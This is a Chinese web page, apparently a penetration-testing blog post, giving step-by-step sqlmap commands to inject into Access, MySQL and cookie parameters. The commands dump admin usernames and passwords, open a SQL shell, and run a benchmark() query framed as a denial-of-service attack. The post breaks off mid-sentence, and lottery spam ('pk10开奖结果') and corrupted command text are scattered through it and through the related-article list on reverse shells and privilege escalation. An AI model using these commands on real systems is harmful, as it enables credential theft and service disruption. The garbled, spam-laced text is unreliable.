sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,很多人都是通过这个工具实施的检测与注入,对于我们从事安全防御的人来说,一定要引起注意,一般的程序员写的代码都是带漏洞的

今天把我一直以来整理的sqlmap笔记发布上来供大家参考。

一共有11种常见SQLmap使用方法:

一、SQLMAP用于Access数据库注入

pk10开奖结果(1) 猜解是否能注入

win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7"
Linux : .lmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7"

(2) 猜解表

win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --tables
Linux: .lmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --tables

(3) 根据猜解的表进行猜解表的字段(假如通过2得到了admin这个表)

win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --columns -T admin
Linux: .lmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --columns -T admin

(4) 根据字段猜解内容(假如通过3得到字段为username和password)

win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --dump -T admin -C "username,password"
Linux: .lmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --dump -T admin -C
"username,[url=]B[/url]password"

二、SQLMAP用于Cookie注入

(1) cookie注入,猜解表

win : python sqlmap。py -u "http://www。xxx。org/jsj/shownews。asp" --cookie "id=31" --table --level 2

(2) 猜解字段,(通过1的表猜解字段,假如表为admin)

win :python sqlmap.py -u "http://www.xxx.org/jsj/shownews.asp" --cookie "id=31" --columns -T admin --level 2

(3) 猜解内容

win :python sqlmap.py -u "http://www.xxx.org/jsj/shownews.asp" --cookie "id=31" --dump -T admin -C "username,password" --level 2

三、SQLMAP用于mysql中DDOS攻击(1) 获取一个Shell

win:
python sqlmap.py -u [url]http://192.168.159.1/news.php?id=1[/url] --sql-shell
Linux:
sqlmap -u [url]http://192.168.159.1/news.php?id=1[/url] --sql-shell

(2) 输入执行语句完成DDOS攻击

select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)

四、SQLMAP用于mysql注入

(1) 查找数据库

python sqlmap.py -u "http://www.xxx.com/link.php?id=321" --dbs

(2) 通过第一步的数据库查找表(假如数据库名为dataname)

python sqlmap.py -u "http://www.xxx.com/link.php?id=321" -D dataname --tables

(3) 通过2中的表得出列名(假如表为table_name)

python sqlmap.py -u "http://www.xxx.com/link.php?id=321" -D dataname -T table_name --columns

(4) 获取字段的值(假如扫描出id,user,password字段)

python sqlmap.py -u "http://www.xxx.com/link.php?id=321" -D dataname -T table_name -C
"id,user,password" --dump

五、SQLMAP中post登陆框注入

(1) 其中的search-test.txt是通过抓包工具burp suite抓到的包并把数据保存为这个txt文件
我们在使用Sqlmap进行post型注入时,经常会出现请求遗漏导致注入失败的情况。这里分享一个小

  • Linux 下多种编程语言的反弹 shell 方法
  • 最新资讯
    小红书二季度清理刷量笔记近40万篇:刷量是红线

    小红书二季度清理刷量

    根据报告,小红书平均每天清理刷量笔记4285篇,平均每5分
    中国第一程序员,微软得不到他就要毁了他

    中国第一程序员,微软得

    他就是国内办公软件第一人、有着天才程序员之称的、 W
    谷歌云焦虑症:现实中没有“龟兔赛跑”

    谷歌云焦虑症:现实中没

    全球云计算赛道,谷歌身处位置颇为尴尬。
    直击|分贝通完成8500万元B轮融资 博将资本领投

    直击|分贝通完成8500

    2019分贝通战略发布会在北京举办, 发布会现场,分贝通对
    旷视发布《人工智能应用准则》 涉及数据安全等六项

    旷视发布《人工智能应

    旷视科技发布基于企业自身管理标准的《人工智能应用准
    新华视点:长租公寓空气检测之痛何时休?

    新华视点:长租公寓空气

    有租客反映,一些公寓出示的空气质量检测报告显示合格,但
    最新文章
    thinkphp代码执行getshell的漏洞解决

    thinkphp代码执行gets

    本文来介绍一下thinkphp官方修复的一个getshell漏洞,框
    SQLMAP注入检查方法 11种常见SQLMAP使用方法详解

    SQLMAP注入检查方法 1

    sqlmap也是渗透中常用的一个注入工具,其实在注入工具方
    Linux 下多种编程语言的反弹 shell 方法

    pk10开奖结果Linux 下多种编程语言

    这篇文章主要介绍了Linux 下多种反弹 shell 方法,需要
    lcx端口转发详细介绍及使用方法(lcx内网转发姿势)

    lcx端口转发详细介绍

    这篇文章主要介绍了lcx端口转发详细介绍及使用方法(lc
    lcx用法之心得总结(piracy)

    lcx用法之心得总结(pi

    这篇文章主要介绍了lcx用法之心得总结,需要的朋友可以
    详解Filezilla server 提权

    详解Filezilla server

    这篇文章主要介绍了详解Filezilla server 提权,需要的
    pk10开奖结果_c976SO pk10开奖结果_czWDTm pk10开奖结果_PRHso2 pk10开奖结果_pxjL7 pk10开奖结果_pRJnQ pk10开奖结果_1fCQd pk10开奖结果_3hjrdmg pk10开奖结果_TAVuVP pk10开奖结果_TA9Lidw pk10开奖结果_Ldzy6M